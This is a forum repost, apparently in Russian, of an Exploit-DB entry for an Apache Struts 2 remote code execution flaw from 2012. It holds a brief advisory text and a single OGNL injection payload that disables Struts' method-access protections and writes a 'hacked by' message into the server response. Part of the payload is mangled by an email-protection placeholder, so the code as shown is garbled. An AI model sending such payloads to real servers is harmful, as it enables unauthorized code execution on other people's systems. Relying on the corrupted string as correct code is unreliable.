Exploit Apache Struts 2 - Skill Name Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37647
Проверка EDB
  1. Пройдено
Автор
KXLZX
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2012-08-23
Apache Struts 2 - Skill Name Remote Code Execution
Код:
source: https://www.securityfocus.com/bid/55165/info

Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#[email protected]@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
 
Источник
www.exploit-db.com

Похожие темы